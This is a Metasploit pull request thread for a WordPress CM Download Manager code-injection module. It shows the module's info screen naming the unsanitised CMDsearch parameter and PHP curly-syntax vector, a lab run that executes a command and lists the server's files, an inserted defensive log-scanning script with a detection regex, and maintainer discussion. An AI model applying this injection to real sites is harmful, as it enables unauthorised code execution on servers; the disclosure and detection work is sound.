
wordpress cm-download-manager plugin code injection#6096

Closed
nixawk wants to merge 1 commit intomasterfrom
unknown repository

Conversation

@nixawk
Contributor

@nixawk nixawk commented Oct 16, 2015

msf exploit(wp_cm_download_manager_exec) > info

       Name: Wordpress CM Download Manager Plugin Code Injection
     Module: exploit/unix/webapp/wp_cm_download_manager_exec
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-09-09

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting          Required  Description
  ----     ---------------          --------  -----------
  CMD      dir                      no        Command to execute
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST    192.168.1.104            yes       The target address
  RPORT    80                       yes       The target port
  URI      /wordpress/cmdownloads/  yes       The full URI path to vBulletin
  VHOST                             no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in the alterSearchQuery() 
  function defined in 
  /wp-content/plugins/cm-download-manager/lib/controllers 
  /CmdownloadController.php for Wordpress CM Download Manager plugin 
  versions 2.0.0 and earlier. User input passed through 'CMDsearch' 
  GET parameter isn't properly sanitized before being used in a call 
  to preg_match_all(). This can be exploited to inject and execute 
  arbitrary code leveraging the PHP's complex curly syntax.

References:
  https://www.exploit-db.com/exploits/35324

msf exploit(wp_cm_download_manager_exec) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] 192.168.1.104:80 - Uploading payload
[*] The server returned: 200 OK
[*] 
             Volume in drive C has no label.
 Volume Serial Number is 2493-29F0

 Directory of C:\xampp\htdocs\wordpress

09/08/2015  09:31 PM    <DIR>          .
09/08/2015  09:31 PM    <DIR>          ..
09/08/2015  11:44 PM               256 .htaccess
09/24/2013  05:18 PM               418 index.php
01/01/2015  05:25 AM            19,930 license.txt
04/23/2015  11:00 AM             7,358 readme.html
08/20/2014  10:30 AM             4,951 wp-activate.php
09/08/2015  09:27 PM    <DIR>          wp-admin
01/08/2012  10:01 AM               271 wp-blog-header.php
01/08/2015  12:05 AM             5,007 wp-comments-post.php
05/09/2015  05:06 PM             2,764 wp-config-sample.php
09/08/2015  09:30 PM             3,046 wp-config.php
09/08/2015  11:43 PM    <DIR>          wp-content
05/24/2015  10:26 AM             3,286 wp-cron.php
09/08/2015  09:27 PM    <DIR>          wp-includes
10/24/2013  03:58 PM             2,380 wp-links-opml.php
04/12/2015  02:29 PM             3,123 wp-load.php
07/28/2015  08:56 PM            34,669 wp-login.php
07/17/2014  02:12 AM             8,252 wp-mail.php
06/24/2015  07:29 PM            11,062 wp-settings.php
06/26/2015  06:03 PM            25,124 wp-signup.php
11/30/2014  02:23 PM             4,035 wp-trackback.php
07/28/2015  05:17 AM             3,055 xmlrpc.php
              18 File(s)        138,987 bytes
               5 Dir(s)   1,587,908,608 bytes free
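
The module description above says the `CMDsearch` GET parameter reaches `preg_match_all()` unsanitized and that PHP's complex curly syntax is the injection vector. A defender reviewing web-server logs for this plugin therefore wants to flag requests to the plugin's `cmdownloads` path whose `CMDsearch` value carries curly-brace variable syntax. The following is an added example, not code from this pull request or from Metasploit; the log lines are constructed in Combined Log Format, the client addresses are documentation-range placeholders, and the path prefix and parameter name are taken from the module output above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Combined Log Format); the IPs and
# timestamps are placeholders, not observations from any real server.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Oct/2015:10:00:01 +0000] "GET /wordpress/cmdownloads/?CMDsearch=report HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [16/Oct/2015:10:00:02 +0000] "GET /wordpress/cmdownloads/?CMDsearch=%7B%24%7Bx%7D%7D HTTP/1.1" 200 8012 "-" "curl/7.43"
192.0.2.12 - - [16/Oct/2015:10:00:03 +0000] "GET /wordpress/?s=curly HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, request
# target (path + query) and status code are all we need here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# PHP complex curly syntax starts with "{$" (or "${" for the older form).
# Whitespace between the two characters is tolerated so trivial spacing
# tricks do not evade the check.
CURLY_RE = re.compile(r'\{\s*\$|\$\s*\{')


def parse_request(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_suspicious(target):
    """True when the request targets the plugin path and its CMDsearch
    parameter contains curly-brace variable syntax after URL decoding."""
    parts = urlsplit(target)
    # Only the plugin's download/search endpoint is of interest.
    if '/cmdownloads' not in parts.path.lower():
        return False
    # parse_qs percent-decodes once; unquote() again so a double-encoded
    # value is still inspected in its decoded form.
    query = parse_qs(parts.query, keep_blank_values=True)
    for value in query.get('CMDsearch', []):
        if CURLY_RE.search(unquote(value)):
            return True
    return False


def scan(log_text):
    """Return (client_ip, request_target) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec and is_suspicious(rec['target']):
            hits.append((rec['ip'], rec['target']))
    return hits


if __name__ == '__main__':
    for ip, target in scan(SAMPLE_LOG):
        print(f'possible CMDsearch curly-syntax injection from {ip}: {target}')
```

The check is deliberately narrow (plugin path plus the `CMDsearch` parameter) so that ordinary WordPress searches containing braces are not flagged; widen the path match if the site serves the plugin under a different prefix than the `/wordpress/cmdownloads/` shown in the module options.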


@wchen-r7
Contributor

Can you please give me a download link for the vulnerable version of the plugin? I can only find 2.2.7. Thanks.

@espreto
Contributor

espreto commented Oct 16, 2015

@wchen-r7 I recommend submitting this to WPSploit, because it has only "Active Installs: 700+". Recalling @todb-r7's recommendation in this comment.

@nixawk
Contributor Author

nixawk commented Oct 16, 2015

We can reproduce the exploit with the newest version. PoC version is here.

@wchen-r7
Contributor

@espreto Do I want to merge this to MSF after submitting to WPSploit?

@todb-r7

todb-r7 commented Oct 16, 2015

@wchen-r7, as @espreto noted, it's a pretty small installation footprint. "Mere hundreds" falls below the line.

@wchen-r7
Contributor

@espreto pull request created in your repository: espreto/wpsploit#5

@wchen-r7 wchen-r7 removed their assignment Oct 16, 2015
@wchen-r7
Contributor

Hi @all3g, it looks like @espreto is actively handling your pull request at espreto/wpsploit#5, so if you don't mind, please carry on the conversation over there, and I'd like to close this pull request here. Thanks.

@wchen-r7 wchen-r7 closed this Oct 17, 2015
@nixawk
Contributor Author

nixawk commented Oct 18, 2015

OK, thanks.
